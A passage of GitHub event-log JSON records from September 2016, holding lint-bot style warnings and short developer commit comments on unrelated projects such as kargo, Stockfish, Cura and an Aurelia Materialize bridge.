^\n```\n[tests/testthat/test_mcmc_nltt.R:51:1:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L51) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:74:28:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L74) *style:* **Commas should always have a space after.**\n```r\n​\t  mcmc_nltt( tree1, LL_BD,c(1, -1), c(TRUE, TRUE),\n                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:75:33:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                               ~^\n```\n[tests/testthat/test_mcmc_nltt.R:75:49:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:75:66:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:75:77:](https://github.com/richelbilderbeek/nLTT/blob/f95530fed5ccc83d873b36b41c5d56a9c87f9e52/tests/testthat/test_mcmc_nltt.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                                           ~^~\n```"}},"created_at":"2016-09-14T13:25:27Z"}
{"id":"4561922334","type":"CommitCommentEvent","actor":{"login":"mattymo"},"repo":{"name":"bogdando/kargo"},"payload":{"comment":{"id":19018790,"position":21,"line":33,"path":"roles/download/defaults/main.yml","commit_id":"f216083083f293b77a20812a24787c9cba52b0d0","created_at":"2016-09-14T13:25:54Z","updated_at":"2016-09-14T13:25:54Z","body":"I don't think we should redefine all these variables. We can shift everything back into downloads repo (as it was before). We can't easily tell download role to pull these from kubernetes/etcd/calico/flannel roles because of the way Ansible works. It makes more sense to delete these from $ROLE/defaults/main.yml"}},"created_at":"2016-09-14T13:25:54Z"}
{"id":"4561925104","type":"CommitCommentEvent","actor":{"login":"kidsboss"},"repo":{"name":"kidsboss/kidsbossTest"},"payload":{"comment":{"id":19018798,"position":null,"line":null,"path":null,"commit_id":"5bae6db8f6f43666f4d8919282397d9aae9a7d4e","created_at":"2016-09-14T13:26:24Z","updated_at":"2016-09-14T13:26:24Z","body":"我删除了日志"}},"created_at":"2016-09-14T13:26:24Z"}
{"id":"4561925911","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19018799,"position":null,"line":null,"path":null,"commit_id":"7aff8923cc376f267370764ededd1b024452b62c","created_at":"2016-09-14T13:26:31Z","updated_at":"2016-09-14T13:26:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 999](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13266&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 213, ignored: 3 Build time: 00:06:43\n### Failed tests\n```\norg.genivi.sota.core.DeviceUpdatesResourceSpec.POST queues a package for update to a specific vehicle: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-14T13:26:31Z"}
{"id":"4561927910","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19018804,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T13:26:53Z","updated_at":"2016-09-14T13:26:53Z","body":"@mcostalba Ok, I will do it once the current [test](http://tests.stockfishchess.org/tests/view/57d872800ebc59030fbe52af) is finished."}},"created_at":"2016-09-14T13:26:53Z"}
{"id":"4561929654","type":"CommitCommentEvent","actor":{"login":"reinhard"},"repo":{"name":"Indoqa/indoqa-boot"},"payload":{"comment":{"id":19018809,"position":null,"line":null,"path":null,"commit_id":"b075ae77a2777dd03274979737a64116c12b3396","created_at":"2016-09-14T13:27:13Z","updated_at":"2016-09-14T13:27:13Z","body":"an createSinglePageHtml solten wir gleich die assets übergeben ..."}},"created_at":"2016-09-14T13:27:13Z"}
{"id":"4561936717","type":"CommitCommentEvent","actor":{"login":"mattymo"},"repo":{"name":"bogdando/kargo"},"payload":{"comment":{"id":19018824,"position":3,"line":3,"path":"roles/download/defaults/main.yml","commit_id":"f216083083f293b77a20812a24787c9cba52b0d0","created_at":"2016-09-14T13:28:27Z","updated_at":"2016-09-14T13:28:27Z","body":"it's bad to have 2 vars point to the same thing. Let's make it like \"{{local_release_dir}}/containers\""}},"created_at":"2016-09-14T13:28:27Z"}
{"id":"4561937484","type":"CommitCommentEvent","actor":{"login":"chandon"},"repo":{"name":"chandon/mautic"},"payload":{"comment":{"id":19018825,"position":51,"line":1478,"path":"app/bundles/LeadBundle/Model/LeadModel.php","commit_id":"80d59f8623063086e9cb1edcb685da404875e904","created_at":"2016-09-14T13:28:35Z","updated_at":"2016-09-14T13:28:35Z","body":"You forgot tags on this one !"}},"created_at":"2016-09-14T13:28:35Z"}
{"id":"4561944383","type":"CommitCommentEvent","actor":{"login":"mattymo"},"repo":{"name":"bogdando/kargo"},"payload":{"comment":{"id":19018840,"position":2,"line":2,"path":"roles/download/handlers/main.yml","commit_id":"f216083083f293b77a20812a24787c9cba52b0d0","created_at":"2016-09-14T13:29:48Z","updated_at":"2016-09-14T13:29:48Z","body":"> {{ containers_save_dir }}/containers.tar\" is what you meant to write.\r\nMaybe we want to compress with gzip."}},"created_at":"2016-09-14T13:29:48Z"}
{"id":"4561954289","type":"CommitCommentEvent","actor":{"login":"sideangleside"},"repo":{"name":"javilinux/sat6Inventory"},"payload":{"comment":{"id":19018858,"position":null,"line":null,"path":null,"commit_id":"5b3645121114761e5ba00f4dcfcdf17b3898cc18","created_at":"2016-09-14T13:31:31Z","updated_at":"2016-09-14T13:31:31Z","body":"@javilinux: are you going to send a PR with this commit? I have some users asking for Satellite 6.2 support in this script, and I want to use this commit as a base for some other 6.2 improvements. "}},"created_at":"2016-09-14T13:31:31Z"}
{"id":"4561956606","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19018865,"position":141,"line":199,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-14T13:31:56Z","updated_at":"2016-09-14T13:31:56Z","body":"Sure, I forgot to commit and push this change. New version: https://github.com/frenzymadness/content/commit/ae11542c44c8660ff03f2fec0057e74cce048cd4"}},"created_at":"2016-09-14T13:31:56Z"}
{"id":"4561960987","type":"CommitCommentEvent","actor":{"login":"kurtextrem"},"repo":{"name":"studioddtonline/Silverbird-M"},"payload":{"comment":{"id":19018873,"position":null,"line":null,"path":null,"commit_id":"cf28003b25283549846423cf7cc9934dd756ceb8","created_at":"2016-09-14T13:32:43Z","updated_at":"2016-09-14T13:32:43Z","body":"According to this: https://github.com/WICG/EventListenerOptions/blob/gh-pages/explainer.md passive listeners do nothing on 'scroll'.\r\nThey only work for every event starting with 'touch' (touchstart, touchend) or 'wheel'."}},"created_at":"2016-09-14T13:32:43Z"}
{"id":"4561965016","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19018881,"position":null,"line":null,"path":null,"commit_id":"c70f01d7b3c7e7a6dfece53a43cfc4cd1e56c875","created_at":"2016-09-14T13:33:26Z","updated_at":"2016-09-14T13:33:26Z","body":"Also see:\r\n\r\n* [Issue 271: Cmake and output artifacts that can't be linked due to missing PIC](http://github.com/weidai11/cryptopp/issues/271)\r\n\r\n* [Commit 1204d3dfcc13ba6f](http://github.com/weidai11/cryptopp/commit/1204d3dfcc13ba6feba0e0a68938dea3567ff6f3)\r\n\r\n* [Commit c70f01d7b3c7e7a6](http://github.com/weidai11/cryptopp/commit/c70f01d7b3c7e7a6dfece53a43cfc4cd1e56c87"}},"created_at":"2016-09-14T13:33:26Z"}
{"id":"4561965444","type":"CommitCommentEvent","actor":{"login":"sanjayssk"},"repo":{"name":"Virtual-TreeView/Virtual-TreeView"},"payload":{"comment":{"id":19018886,"position":99,"line":99,"path":"Demos/Interfaces/modelviewform.pas","commit_id":"f45adc0c92677412d2c6c49330bafdfc35f848d7","created_at":"2016-09-14T13:33:30Z","updated_at":"2016-09-14T13:33:30Z","body":"No, it's not needed. I remember putting it there when confirming whether the interface objects are being destroyed. Then I forgot to remove it. Thanks."}},"created_at":"2016-09-14T13:33:30Z"}
{"id":"4561966018","type":"CommitCommentEvent","actor":{"login":"Loque-"},"repo":{"name":"torchbox/wagtail-torchbox"},"payload":{"comment":{"id":19018889,"position":null,"line":null,"path":null,"commit_id":"e46dbe9298babf105f51096eb480ab64a9f534a0","created_at":"2016-09-14T13:33:36Z","updated_at":"2016-09-14T13:33:36Z","body":"Hah I just noticed I could have done this a lot better/quicker/easier by changing line 295 so that it does the thing it is expected to."}},"created_at":"2016-09-14T13:33:36Z"}
{"id":"4561967053","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19018894,"position":null,"line":null,"path":null,"commit_id":"1204d3dfcc13ba6feba0e0a68938dea3567ff6f3","created_at":"2016-09-14T13:33:48Z","updated_at":"2016-09-14T13:33:48Z","body":"Also see:\r\n\r\n* [Issue 271: Cmake and output artifacts that can't be linked due to missing PIC](http://github.com/weidai11/cryptopp/issues/271)\r\n\r\n* [Commit 1204d3dfcc13ba6f](http://github.com/weidai11/cryptopp/commit/1204d3dfcc13ba6feba0e0a68938dea3567ff6f3)\r\n\r\n* [Commit c70f01d7b3c7e7a6](http://github.com/weidai11/cryptopp/commit/c70f01d7b3c7e7a6dfece53a43cfc4cd1e56c87)"}},"created_at":"2016-09-14T13:33:48Z"}
{"id":"4561968768","type":"CommitCommentEvent","actor":{"login":"okapia"},"repo":{"name":"danielshahaf/parseable-dash-dash-help"},"payload":{"comment":{"id":19018898,"position":null,"line":null,"path":null,"commit_id":"8c21c2025c0eefaa3dbbabb58530c6c14078cca2","created_at":"2016-09-14T13:34:05Z","updated_at":"2016-09-14T13:34:05Z","body":"Code that generates parse options doesn't necessarily have enough information to generate the completion grammar. There are existing attempts to generate bash or zsh completions directly from the parser. E.g. for Ruby code that uses the optparse package there is a hidden flag --*-completion-zsh=name. I contributed something to TCLAP which is a C++ parser that is fairly obscure but was standard where I worked. It tends to get you a good starting point but not the whole way.\r\n\r\nI'd be inclined to consider going the other way: generate input to common parsers from the grammar. This might do a better job of reporting things like mutually exclusive options than most parsers deal with.\r\n\r\n"}},"created_at":"2016-09-14T13:34:05Z"}
{"id":"4561972431","type":"CommitCommentEvent","actor":{"login":"Magic73"},"repo":{"name":"aritchie/userdialogs"},"payload":{"comment":{"id":19018908,"position":null,"line":null,"path":null,"commit_id":"7a00eb69a759cb36ca3d388f15ae05dc55ca1e8a","created_at":"2016-09-14T13:34:43Z","updated_at":"2016-09-14T13:34:43Z","body":"I love UWP ;)\r\n\r\nbut, as I see there's an error again.\r\nPercentComplete is an int value from 0 to 100.\r\nProgressBar doesn't have  Minimum and Maximum set, so their values are 0 and 1 respectively.\r\nyou have to add these properties to the progress bar.\r\n\r\n` <ProgressBar x:Name=\"ProgressBar\" Value=\"{Binding PercentComplete}\" HorizontalAlignment=\"Stretch\" IsIndeterminate=\"{Binding IsIndeterministic}\" Minimum=\"0\" Maximum=\"100\" />`"}},"created_at":"2016-09-14T13:34:43Z"}
{"id":"4561973394","type":"CommitCommentEvent","actor":{"login":"Thanood"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":19018910,"position":null,"line":null,"path":null,"commit_id":"9efddc28efb1ad2555bbd3e3ca0660814eadeeb8","created_at":"2016-09-14T13:34:55Z","updated_at":"2016-09-14T13:34:55Z","body":"Wow, thanks for trying.. :smiley: \r\n\r\n1. please try `node ./node_modules/.bin/r.js -o rbuild.js` - does that work?\r\n2. interesting but maybe a follow-up error from not being able to run `rbuild.js`? If not, I'll have to reproduce this. I guess the input update service is not called.\r\n3. are these still supposed to be called? Can aurelia-cli load font files? Last time I looked there was an issue about it not being able to load such files.\r\n"}},"created_at":"2016-09-14T13:34:55Z"}
{"id":"4561985537","type":"CommitCommentEvent","actor":{"login":"unintendedbear"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":19018942,"position":null,"line":null,"path":null,"commit_id":"7988ad8315d0a5d6118fe3d8deb75db5f05e4de0","created_at":"2016-09-14T13:37:07Z","updated_at":"2016-09-14T13:37:07Z","body":"Please @JJ , @deantares, @mgarenas , or @amorag review which node is the node you're studying, because sometimes is says 1010, others 1011, and in the name of the figures (filenames) appears 1011."}},"created_at":"2016-09-14T13:37:07Z"}
{"id":"4561998397","type":"CommitCommentEvent","actor":{"login":"philharmony"},"repo":{"name":"philharmony/PerfD"},"payload":{"comment":{"id":19018983,"position":null,"line":null,"path":null,"commit_id":"d5147948350ebcbba0dedb1ca4166b3e1cfce999","created_at":"2016-09-14T13:39:16Z","updated_at":"2016-09-14T13:39:16Z","body":"Meue funktion"}},"created_at":"2016-09-14T13:39:16Z"}
{"id":"4562007154","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"tokuhirom/Module-Build-Pluggable-XSUtil"},"payload":{"comment":{"id":19019010,"position":null,"line":null,"path":null,"commit_id":"f173210835b0a38652f488f7ae10862b0edc7d4b","created_at":"2016-09-14T13:40:44Z","updated_at":"2016-09-14T13:40:44Z","body":"Thank you. Every time I have to install Digest::BLAKE2 this problem crops up and bites me ;)  The Module::Build::Pluggable::XSUtil fails to be built, and thus the BLAKE2 install fails.  I have been force installing, then patching, then it works.  But that is just because I know where the problem is."}},"created_at":"2016-09-14T13:40:44Z"}
{"id":"4562008706","type":"CommitCommentEvent","actor":{"login":"maxsittipan"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19019013,"position":null,"line":null,"path":null,"commit_id":"3bf4a41ae6c459753cc5486d514d111723c33758","created_at":"2016-09-14T13:40:59Z","updated_at":"2016-09-14T13:40:59Z","body":"ขอบพระคุณครับท่าน "}},"created_at":"2016-09-14T13:40:59Z"}
{"id":"4562009004","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19019014,"position":null,"line":null,"path":null,"commit_id":"4d72913711c239234e2831fbc30629687aa8c399","created_at":"2016-09-14T13:41:02Z","updated_at":"2016-09-14T13:41:02Z","body":"danke für die schnelle Rückmeldung!!"}},"created_at":"2016-09-14T13:41:02Z"}
{"id":"4562011919","type":"CommitCommentEvent","actor":{"login":"maxsittipan"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19019022,"position":null,"line":null,"path":null,"commit_id":"3bf4a41ae6c459753cc5486d514d111723c33758","created_at":"2016-09-14T13:41:33Z","updated_at":"2016-09-14T13:41:33Z","body":"มีอะไรที่ผมต้องทำกันโดนแบนไหมครับ ท่าน "}},"created_at":"2016-09-14T13:41:33Z"}
{"id":"4562013942","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19019025,"position":16,"line":2492,"path":"resources/definitions/fdmprinter.def.json","commit_id":"750018003d6d43e346c4aba14767179a3a66890d","created_at":"2016-09-14T13:41:53Z","updated_at":"2016-09-14T13:41:53Z","body":"Updated it for you in 5c5d1888894d541eb8ff8c092daf5bf1170ff7fd."}},"created_at":"2016-09-14T13:41:53Z"}
{"id":"4562019528","type":"CommitCommentEvent","actor":{"login":"Gupern"},"repo":{"name":"Gupern/CLTL-translating-into-Chinese"},"payload":{"comment":{"id":19019037,"position":null,"line":null,"path":null,"commit_id":"18493194cace9a15ee7859c1ead7bf82bc0136a5","created_at":"2016-09-14T13:42:49Z","updated_at":"2016-09-14T13:42:49Z","body":"test"}},"created_at":"2016-09-14T13:42:49Z"}
{"id":"4562021090","type":"CommitCommentEvent","actor":{"login":"1PiotrCz"},"repo":{"name":"1PiotrCz/Politikon"},"payload":{"comment":{"id":19019041,"position":null,"line":null,"path":null,"commit_id":"eb264647bbe8aa9bb62e85d4b83de97f33e6f632","created_at":"2016-09-14T13:43:06Z","updated_at":"2016-09-14T13:43:06Z","body":"Instalując cała bazę od nowa, powił mi się problem z tą poprawką. Głównie przy wywołaniu \"resolved_by\""}},"created_at":"2016-09-14T13:43:06Z"}
{"id":"4562029269","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19019060,"position":null,"line":null,"path":null,"commit_id":"e9113ea07f5ed6edd5ae9e57e69c8c7addc0b5b0","created_at":"2016-09-14T13:44:29Z","updated_at":"2016-09-14T13:44:29Z","body":"Still not correct. We are asking you to create a hash "}},"created_at":"2016-09-14T13:44:29Z"}
{"id":"4562036826","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19019087,"position":6,"line":52,"path":"composer.json","commit_id":"12efab4cb980ecddb6a95c6bc3829a16b54b2ba3","created_at":"2016-09-14T13:45:47Z","updated_at":"2016-09-14T13:45:47Z","body":"remember to keep composer dependencies sorted by name"}},"created_at":"2016-09-14T13:45:47Z"}
{"id":"4562040311","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19019093,"position":null,"line":null,"path":null,"commit_id":"42287294509203c4962b23f8316c02f4d9efa02a","created_at":"2016-09-14T13:46:23Z","updated_at":"2016-09-14T13:46:23Z","body":"We don't ask you to create a method. Jus a case statement that checks the value ad a variable named 'age'. This is not a correct answer. "}},"created_at":"2016-09-14T13:46:23Z"}
{"id":"4562045029","type":"CommitCommentEvent","actor":{"login":"dbarrosop"},"repo":{"name":"napalm-automation/napalm-ios"},"payload":{"comment":{"id":19019100,"position":null,"line":null,"path":null,"commit_id":"993d0d7d10401d204efe3c24ff0236421e506af3","created_at":"2016-09-14T13:47:11Z","updated_at":"2016-09-14T13:47:11Z","body":"Be aware we had some troubles with this. To unbreak the release I implemented this but we can discuss it: https://github.com/napalm-automation/napalm-base/pull/80/files"}},"created_at":"2016-09-14T13:47:11Z"}
{"id":"4562047233","type":"CommitCommentEvent","actor":{"login":"yangwen0017"},"repo":{"name":"yangwen0017/test"},"payload":{"comment":{"id":19019106,"position":4,"line":6,"path":"hello world.txt","commit_id":"8fbf35a33be8cb91027e6ed41050533439712267","created_at":"2016-09-14T13:47:32Z","updated_at":"2016-09-14T13:47:32Z","body":"？？"}},"created_at":"2016-09-14T13:47:32Z"}
{"id":"4562048686","type":"CommitCommentEvent","actor":{"login":"appijumbo"},"repo":{"name":"appijumbo/jekyllTest"},"payload":{"comment":{"id":19019109,"position":null,"line":null,"path":null,"commit_id":"27352424f984862c45c58cfc88589e54e643775b","created_at":"2016-09-14T13:47:46Z","updated_at":"2016-09-14T13:47:46Z","body":"added website for easy reference"}},"created_at":"2016-09-14T13:47:46Z"}
{"id":"4562050863","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19019113,"position":null,"line":null,"path":null,"commit_id":"42287294509203c4962b23f8316c02f4d9efa02a","created_at":"2016-09-14T13:48:09Z","updated_at":"2016-09-14T13:48:09Z","body":"We also ask you to return a value not to print it so the use of 'puts' is not right here. I commented on this before. "}},"created_at":"2016-09-14T13:48:09Z"}
{"id":"4562051916","type":"CommitCommentEvent","actor":{"login":"xpablo1"},"repo":{"name":"xpablo1/pablo"},"payload":{"comment":{"id":19019116,"position":1,"line":1,"path":"hgh/jju.ppo","commit_id":"3510a8434c4e95234ea547c6c7f57f0468fcf1bc","created_at":"2016-09-14T13:48:19Z","updated_at":"2016-09-14T13:48:19Z","body":"fhgjgf"}},"created_at":"2016-09-14T13:48:19Z"}
{"id":"4562052498","type":"CommitCommentEvent","actor":{"login":"sheyooo"},"repo":{"name":"aezumezu/string-classes"},"payload":{"comment":{"id":19019117,"position":61,"line":61,"path":"src/string-classes.js","commit_id":"e71bb06eba4e31c2de92839dd30d6901188b1a02","created_at":"2016-09-14T13:48:24Z","updated_at":"2016-09-14T13:48:24Z","body":"Not sure if this is more than 80 characters on one line, check it."}},"created_at":"2016-09-14T13:48:24Z"}
{"id":"4562053020","type":"CommitCommentEvent","actor":{"login":"hydra"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19019119,"position":null,"line":null,"path":null,"commit_id":"2507b90a2827496fd9aae04624bc2a8aabbb64f3","created_at":"2016-09-14T13:48:29Z","updated_at":"2016-09-14T13:48:29Z","body":"I will change this to use the bitmask, yes, the values should have been in HEX, that was probably the original intention."}},"created_at":"2016-09-14T13:48:29Z"}
{"id":"4562054640","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19019123,"position":5,"line":44,"path":"app/config/parameters.yml.dist","commit_id":"12efab4cb980ecddb6a95c6bc3829a16b54b2ba3","created_at":"2016-09-14T13:48:46Z","updated_at":"2016-09-14T13:48:46Z","body":"Bad parameter name. Try to avoid generic names, it's better to say \"recaptcha_public_key\" for exemple. Think in a lot of parameters, you (or your workmates) can get confussed with \"here_is_your_public_key\" quickly"}},"created_at":"2016-09-14T13:48:46Z"}
{"id":"4562059031","type":"CommitCommentEvent","actor":{"login":"sevazhidkov"},"repo":{"name":"xenx/recommendation_system"},"payload":{"comment":{"id":19019131,"position":null,"line":null,"path":null,"commit_id":"b85e31942a94d42c7266e20c42bcdbd9bc6feaf4","created_at":"2016-09-14T13:49:29Z","updated_at":"2016-09-14T13:49:29Z","body":"👍 "}},"created_at":"2016-09-14T13:49:29Z"}
{"id":"4562061714","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19019135,"position":null,"line":null,"path":null,"commit_id":"99f5edbf7d024bb586c4a1b553476bba89bd3e55","created_at":"2016-09-14T13:49:54Z","updated_at":"2016-09-14T13:49:54Z","body":"[Code coverage](https://98-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-14T13:49:54Z"}
{"id":"4562065453","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19019141,"position":null,"line":null,"path":null,"commit_id":"00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e","created_at":"2016-09-14T13:50:31Z","updated_at":"2016-09-14T13:50:31Z","body":"5626-Plant-HX-min-DT (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2336 of 2336 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T13:50:31Z"}
{"id":"4562073042","type":"CommitCommentEvent","actor":{"login":"WetRobot"},"repo":{"name":"WetRobot/popEpi"},"payload":{"comment":{"id":19019157,"position":null,"line":null,"path":null,"commit_id":"46260bd3aa9632cb7c1e9025aa27fc13360306ad","created_at":"2016-09-14T13:51:45Z","updated_at":"2016-09-14T13:51:45Z","body":"I think you meant to close #112 :)"}},"created_at":"2016-09-14T13:51:45Z"}
{"id":"4562085198","type":"CommitCommentEvent","actor":{"login":"Thanood"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":19019188,"position":null,"line":null,"path":null,"commit_id":"9efddc28efb1ad2555bbd3e3ca0660814eadeeb8","created_at":"2016-09-14T13:53:45Z","updated_at":"2016-09-14T13:53:45Z","body":"Try to put this into the `aurelia.json` config for Materialize:\r\n\r\n```javascript\r\n\"exports\": \"Materialize\"\r\n```\r\n\r\n"}},"created_at":"2016-09-14T13:53:45Z"}
{"id":"4562087381","type":"CommitCommentEvent","actor":{"login":"fabiohx"},"repo":{"name":"fabiohx/hello-world"},"payload":{"comment":{"id":19019195,"position":null,"line":null,"path":null,"commit_id":"aa97199b5b9da1ec5eb3f3975fa8b2d34490d105","created_at":"2016-09-14T13:54:07Z","updated_at":"2016-09-14T13:54:07Z","body":"test"}},"created_at":"2016-09-14T13:54:07Z"}
{"id":"4562090854","type":"CommitCommentEvent","actor":{"login":"Slydelix"},"repo":{"name":"ILoveCappucino/ship-sinking"},"payload":{"comment":{"id":19019211,"position":null,"line":null,"path":null,"commit_id":"04fc205d28994ed95a5a03d9e4b56c7242592a99","created_at":"2016-09-14T13:54:41Z","updated_at":"2016-09-14T13:54:41Z","body":"lol"}},"created_at":"2016-09-14T13:54:41Z"}
{"id":"4562090895","type":"CommitCommentEvent","actor":{"login":"fengxuangit"},"repo":{"name":"the-c0d3r/Fox-scan"},"payload":{"comment":{"id":19019212,"position":6,"line":27,"path":"libs/func.py","commit_id":"91030db31b6dd69fb77befc5e7eed91da72c1142","created_at":"2016-09-14T13:54:42Z","updated_at":"2016-09-14T13:54:42Z","body":"hi 首先感谢你的pr, 但是很抱歉我不能合，因为这里会把libs/目录也带上了, 但是config.xml目录在上一层。  我已经修复这个问题了。还是感谢。"}},"created_at":"2016-09-14T13:54:42Z"}
{"id":"4562092233","type":"CommitCommentEvent","actor":{"login":"eoghan2t9"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19019218,"position":null,"line":null,"path":null,"commit_id":"d6066525fc4e96cd6ce180922f2e47c5363f039e","created_at":"2016-09-14T13:54:56Z","updated_at":"2016-09-14T13:54:56Z","body":"The build/packer script I created from scratch with hours and days of debugging to get it too function right I'm not talking about the code in anykernel however I did change some of the binarys to ones that are compatible for are chipset. All I what is my credit added back where it belongs. If used code that you created and was widely available online I would still give you the proper credits and leave and credits to yourself that in the code in tacked that's what all devs do no matter if the code is universal its a way of saying thanks for ether creating a useful thing."}},"created_at":"2016-09-14T13:54:56Z"}
{"id":"4562094233","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19019224,"position":null,"line":null,"path":null,"commit_id":"322b839292136e1b31956b2297b122dee2da6e2c","created_at":"2016-09-14T13:55:18Z","updated_at":"2016-09-14T13:55:18Z","body":":+1:"}},"created_at":"2016-09-14T13:55:18Z"}
{"id":"4562100493","type":"CommitCommentEvent","actor":{"login":"pmario"},"repo":{"name":"Jermolene/TiddlyWiki5"},"payload":{"comment":{"id":19019241,"position":6,"line":15,"path":"core/palettes/Blanca.tid","commit_id":"16301532bfed17564e175b066ba4f8da1ee70ffe","created_at":"2016-09-14T13:56:18Z","updated_at":"2016-09-14T13:56:18Z","body":"This behaviour causes a warning in the browser debug tools! ....\r\nSo you end up spending time to search for the reason. May be CSS tiddler corrupted or syntax problem ....  Just to find out after 30min, that it's intentional. -> time wasted :/"}},"created_at":"2016-09-14T13:56:18Z"}
{"id":"4562104039","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19019247,"position":null,"line":null,"path":null,"commit_id":"e9bd9a18a60780e5294a7987328fac6a8ad1fece","created_at":"2016-09-14T13:56:51Z","updated_at":"2016-09-14T13:56:51Z","body":"Yes, but you are a bit late."}},"created_at":"2016-09-14T13:56:51Z"}
{"id":"4562109082","type":"CommitCommentEvent","actor":{"login":"jasonhjohnson"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":19019257,"position":null,"line":null,"path":null,"commit_id":"9efddc28efb1ad2555bbd3e3ca0660814eadeeb8","created_at":"2016-09-14T13:57:41Z","updated_at":"2016-09-14T13:57:41Z","body":"Okay regarding #1 above...this is the new error I get: \r\n```\r\nnode ./node_modules/.bin/r.js -o rbuild.js\r\nC:\\Users\\[myproject]\\node_modules\\.bin\\r.js:2\r\nbasedir=$(dirname \"$(echo \"$0\" | sed -e 's,\\\\,/,g')\")\r\n          ^^^^^^^\r\n\r\nSyntaxError: missing ) after argument list\r\n    at exports.runInThisContext (vm.js:53:16)\r\n    at Module._compile (module.js:373:25)\r\n    at Object.Module._extensions..js (module.js:416:10)\r\n    at Module.load (module.js:343:32)\r\n    at Function.Module._load (module.js:300:12)\r\n    at Function.Module.runMain (module.js:441:10)\r\n    at startup (node.js:139:18)\r\n    at node.js:968:3\r\n```"}},"created_at":"2016-09-14T13:57:41Z"}
